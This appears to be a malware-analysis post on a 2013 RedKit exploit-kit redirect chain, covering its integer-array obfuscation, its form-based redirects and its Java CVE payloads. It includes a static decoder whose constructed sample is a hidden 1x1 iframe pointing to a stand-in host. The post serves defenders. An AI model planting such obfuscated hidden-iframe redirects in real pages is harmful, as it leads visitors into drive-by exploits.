NOTE: Information is based on RedKit samples seen on 2013-06-12
Samples of redirect chain:
"First thing first"
The redirect page on the first host in the chain carries JScript that builds the request to the second host in the chain from an array of integers.
The script's logic is quite simple:
- add 23 to every integer in the array
- build a string by converting each integer to the character with that code
- evaluate the resulting string
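The decoding routine above, as an added example that is not code from the original post or from the RedKit sample itself. It reproduces the two transforms (add 23, convert to characters) but deliberately stops short of the eval(), pulling the next-hop URL out of the decoded text instead, and it brute-forces the offset so the same tool still works if a later sample changes the constant. The integer array, the payload it encodes and the host name second-host.example are constructed for this example and are not taken from a real sample.

```javascript
// Added example: static decoder for the first-stage RedKit redirector.
// Constructed sample data; no real RedKit artefacts are embedded here.

const KEY = 23; // offset the observed sample adds to each integer

// Encoder used only to build the constructed sample array below.
// (A real redirect page already contains the array in encoded form.)
function encode(s, key = KEY) {
  return Array.from(s, ch => ch.charCodeAt(0) - key);
}

// Decode exactly as the redirector does, minus the eval().
function decode(ints, key = KEY) {
  return ints.map(n => String.fromCharCode(n + key)).join("");
}

// Constructed stand-in for the request to the second host
// (hypothetical host name, hypothetical path).
const SAMPLE_PAYLOAD =
  'document.write("<iframe src=\\"http://second-host.example/redir.php\\" width=1 height=1></iframe>")';
const SAMPLE_ARRAY = encode(SAMPLE_PAYLOAD);

// Pull every URL out of the decoded script without executing it.
function extractUrls(script) {
  const re = /https?:\/\/[^\s"'<>\\]+/g;
  return Array.from(script.matchAll(re), m => m[0]);
}

// If a later sample changes the constant, try every offset and keep the
// ones that yield printable ASCII containing typical redirector keywords.
function guessKey(ints, maxKey = 255) {
  const candidates = [];
  for (let k = 0; k <= maxKey; k++) {
    const s = decode(ints, k);
    if (/^[\x20-\x7e]+$/.test(s) && /document|location|iframe|src/.test(s)) {
      candidates.push(k);
    }
  }
  return candidates;
}

// Full pass: recover the key, decode, and list the next hop(s).
function analyze(ints) {
  const keys = guessKey(ints);
  if (keys.length === 0) return { key: null, script: "", urls: [] };
  const script = decode(ints, keys[0]);
  return { key: keys[0], script, urls: extractUrls(script) };
}

const result = analyze(SAMPLE_ARRAY);
console.log("offset:", result.key);
console.log("decoded:", result.script);
console.log("next hop(s):", result.urls);
```

Feed analyze() the integer array copied out of the redirect page and it returns the offset, the decoded script and the URLs it references, which is what you want for blocking the second host without ever running the attacker's code.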
"Second thing second"
The redirect page on the second host in the chain is rather simple.
An <iframe> with an 'onLoad' handler calls the 'go()' function after a 99 millisecond delay. The function creates a simple HTML document containing a <form> and submits it; the <form> action redirects the browser to a RedKit landing page. A separate <script> also sends the browser to the landing page after 3333 milliseconds, presumably a safety net in case the form submission fails.
"Last thing last"
In the previous instances, a malicious JAR file targeting 'CVE-2012-1723' was served for GET requests with Java 6 strings in the User-Agent field, but in this instance the JAR file is armed with 'CVE-2013-1493'. Either the server-side check of the Java version is gone, or the previous exploit has simply been replaced with the new one; time will tell.